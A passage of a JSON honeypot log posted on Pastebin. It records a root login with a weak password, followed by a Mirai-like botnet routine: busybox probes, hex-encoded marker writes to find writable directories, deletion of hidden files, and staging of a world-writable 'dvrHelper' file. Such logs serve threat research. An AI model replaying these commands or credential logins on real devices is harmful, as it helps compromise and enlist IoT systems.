 665.                 "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
 666.                 "timestamp": "2019-08-06T17:34:26.038Z"
 667.             },
 668.             {
 669.                 "eventid": "command.input",
 670.                 "input": "/bin/busybox ECCHI",
 671.                 "timestamp": "2019-08-06T17:34:25.801Z"
 672.             },
 673.             {
 674.                 "eventid": "command.input",
 675.                 "input": "/bin/busybox cat /bin/echo",
 676.                 "timestamp": "2019-08-06T17:34:25.559Z"
 677.             },
 678.             {
 679.                 "eventid": "command.input",
 680.                 "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
 681.                 "timestamp": "2019-08-06T17:34:25.124Z"
 682.             },
 683.             {
 684.                 "eventid": "command.input",
 685.                 "input": "cd /",
 686.                 "timestamp": "2019-08-06T17:34:25.122Z"
 687.             },
 688.             {
 689.                 "eventid": "command.input",
 690.                 "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
 691.                 "timestamp": "2019-08-06T17:34:25.119Z"
 692.             },
 693.             {
 694.                 "eventid": "command.input",
 695.                 "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
 696.                 "timestamp": "2019-08-06T17:34:25.116Z"
 697.             },
 698.             {
 699.                 "eventid": "command.input",
 700.                 "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
 701.                 "timestamp": "2019-08-06T17:34:25.113Z"
 702.             },
 703.             {
 704.                 "eventid": "command.input",
 705.                 "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
 706.                 "timestamp": "2019-08-06T17:34:25.111Z"
 707.             },
 708.             {
 709.                 "eventid": "command.input",
 710.                 "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
 711.                 "timestamp": "2019-08-06T17:34:25.107Z"
 712.             },
 713.             {
 714.                 "eventid": "command.input",
 715.                 "input": "rm /.t; rm /.sh; rm /.human",
 716.                 "timestamp": "2019-08-06T17:34:25.104Z"
 717.             },
 718.             {
 719.                 "eventid": "command.input",
 720.                 "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
 721.                 "timestamp": "2019-08-06T17:34:25.099Z"
 722.             },
 723.             {
 724.                 "eventid": "command.input",
 725.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
 726.                 "timestamp": "2019-08-06T17:34:23.668Z"
 727.             },
 728.             {
 729.                 "eventid": "command.input",
 730.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
 731.                 "timestamp": "2019-08-06T17:34:23.662Z"
 732.             },
 733.             {
 734.                 "eventid": "command.input",
 735.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
 736.                 "timestamp": "2019-08-06T17:34:23.655Z"
 737.             },
 738.             {
 739.                 "eventid": "command.input",
 740.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
 741.                 "timestamp": "2019-08-06T17:34:23.647Z"
 742.             },
 743.             {
 744.                 "eventid": "command.input",
 745.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
 746.                 "timestamp": "2019-08-06T17:34:22.913Z"
 747.             },
 748.             {
 749.                 "eventid": "command.input",
 750.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
 751.                 "timestamp": "2019-08-06T17:34:22.9Z"
 752.             },
 753.             {
 754.                 "eventid": "command.input",
 755.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
 756.                 "timestamp": "2019-08-06T17:34:22.894Z"
 757.             },
 758.             {
 759.                 "eventid": "command.input",
 760.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
 761.                 "timestamp": "2019-08-06T17:34:22.888Z"
 762.             },
 763.             {
 764.                 "eventid": "command.input",
 765.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
 766.                 "timestamp": "2019-08-06T17:34:22.882Z"
 767.             },
 768.             {
 769.                 "eventid": "command.input",
 770.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
 771.                 "timestamp": "2019-08-06T17:34:22.877Z"
 772.             },
 773.             {
 774.                 "eventid": "command.input",
 775.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
 776.                 "timestamp": "2019-08-06T17:34:22.865Z"
 777.             },
 778.             {
 779.                 "eventid": "command.input",
 780.                 "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
 781.                 "timestamp": "2019-08-06T17:34:22.859Z"
 782.             },
 783.             {
 784.                 "eventid": "command.input",
 785.                 "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
 786.                 "timestamp": "2019-08-06T17:34:22.617Z"
 787.             },
 788.             {
 789.                 "eventid": "command.input",
 790.                 "input": "/bin/busybox ps; /bin/busybox ECCHI",
 791.                 "timestamp": "2019-08-06T17:34:22.375Z"
 792.             },
 793.             {
 794.                 "eventid": "command.input",
 795.                 "input": "bash",
 796.                 "timestamp": "2019-08-06T17:34:21.3Z"
 797.             },
 798.             {
 799.                 "eventid": "command.input",
 800.                 "input": "terminal",
 801.                 "timestamp": "2019-08-06T17:34:21.298Z"
 802.             },
 803.             {
 804.                 "eventid": "command.input",
 805.                 "input": "linuxshell",
 806.                 "timestamp": "2019-08-06T17:34:21.296Z"
 807.             },
 808.             {
 809.                 "eventid": "command.input",
 810.                 "input": "sh",
 811.                 "timestamp": "2019-08-06T17:34:21.295Z"
 812.             },
 813.             {
 814.                 "eventid": "command.input",
 815.                 "input": "shell",
 816.                 "timestamp": "2019-08-06T17:34:21.292Z"
 817.             },
 818.             {
 819.                 "eventid": "command.input",
 820.                 "input": "enable",
 821.                 "timestamp": "2019-08-06T17:34:21.043Z"
 822.             },
 823.             {
 824.                 "eventid": "login.success",
 825.                 "geoip": {
 826.                     "city_name": "",
 827.                     "country_name": "Netherlands"
 828.                 },
 829.                 "password": "linuxshell",
 830.                 "timestamp": "2019-08-06T17:34:20.385Z",
 831.                 "username": "root"
 832.             }
 833.         ]
 834.     }
 835. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top